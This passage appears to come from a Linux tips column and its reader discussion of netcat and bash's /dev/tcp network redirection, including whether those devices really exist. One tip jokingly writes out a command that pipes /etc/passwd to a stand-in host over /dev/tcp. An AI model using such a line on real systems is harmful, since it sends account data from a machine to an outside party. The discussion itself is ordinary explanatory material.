netcat (actually the executable should be called nc) is what I needed, plus
much more. It is capable of running in both client and server (listening)
mode, to cope with both TCP and UDP, and provides the more straightforward
concept you could ask for: it reads standard input and sends it to the
remote destination, and gives you the incoming traffic on the standard
output. Quite nice, isn't it? netcat should be already available in your
Linux box, anyway you can download it here:
[108]http://www.atstake.com/research/tools/network_utilities
I was very proud of my discovery (only 5-6 years of research!) when recently
I had to find something that - quite surprising to me - was even simpler. I
mean, to solve my ancient two-nights-without-sleep problem I didn't even
need an external program! I found that what I needed can be done entirely
inside the shell, provided that you're using bash - and all of us are using
bash, aren't we?
This is the trick: bash defines some fake devices which you can use as files
for redirection - but you actually get some IP traffic with them! So you can
send your passwd file to your worst enemy at example.com simply by issuing
this command:
cat /etc/passwd > /dev/tcp/example.com/10000
(we all know that our worst enemy accepts passwd files listening to port
10000)
That's it - and you can do that with UDP as well! If you want to find out
more, take a look at the Bash Advanced Scripting Guide, in particular
paragraph 28.1 ([109]http://www.tldp.org/LDP/abs/html/devref1.html).
This is my 2c Tip!
_______
I tried to seek inside /dev to see if there is any tcp or udp device, but
found neither - that's why I claim that these devices are bash-interpreted.
If you know more about this... correct please!
The Editor's Scissors had a grand time with this one. -- Heather
They're not defined by the shell, nor are they related to it -- they're
just named FIFOs that the kernel defines are virtual when a port needs to
be listened on. -- Thomas
[Jason Creighton] Quoting from the bash manpage:
Bash handles several filenames specially when they are used in
redirections, as described in the following table
[Ben] ben@Fenrir:~$ ls -l /dev/tcp
ls: /dev/tcp: No such file or directory
The Talmud, I mean the "bash" man page, offers no further help; however,
the Commentaries... err, /usr/src/linux/Documentation/devices.txt, says
these are iBCS-2 compatability devices...
So, I made these nodes - with a little help from Perl:
ben@Fenrir:/usr/src/linux/Documentation$ su
Password:
root@Fenrir:/usr/src/linux/Documentation# mkdir /dev/inet
root@Fenrir:/usr/src/linux/Documentation# perl -wne'
if(m#0 = /dev/socksys#../raw/){/(\d+) = ([^\s]+)/;
system"mknod -m 0664 $2 c 30 $1; chgrp dialout $2"}
' devices.txt
root@Fenrir:/usr/src/linux/Documentation# perl -wlne'
if (m#/dev/ip #../X0R/){/([^\s]+) -> ([^\s]+)/;
system"ln -s $2 $1"}' devices.txt
Group "dialout" allows its members to use those devices.
In the next invocation, I selected the second group from above and created
the symlinks by using much the same mechanism.
So, after all of that - will the stuff promised by the Bash man page work?
ben@Fenrir:~$ su -c 'thttpd -d ~ben/www'
ben@Fenrir:~$ cat /dev/tcp/localhost/80
cat: /dev/tcp/localhost/80: Not a directory
ben@Fenrir:~$ nc /dev/tcp/localhost/80
/dev/tcp/localhost/80: forward host lookup failed: Unknown host
[Kapil] I assume you are really [110]Debianized. So quoting from
/usr/share/doc/bash/README.Debian.gz:
9. Why is bash configured with --disable-net-redirections?
It can produce completely unexpected results. This kind of
feature should not be part of a shell but a special. tool. And
that tool has existed for years already, it's called netcat.
And that brings us back around to Flavio's pleased discovery :) -- Heather
[Jason] So, if you were going to use this silly little bash trick instead
of netcat, you would do something like this:
~$ cat /dev/tcp/localhost/25
cat: /dev/tcp/localhost/25: No such file or directory
~$ cat < /dev/tcp/localhost/25
220 jpc.example.com ESMTP Exim 4.20 Fri, 16 Jul 2004 16:32:55 -0600
=8= |
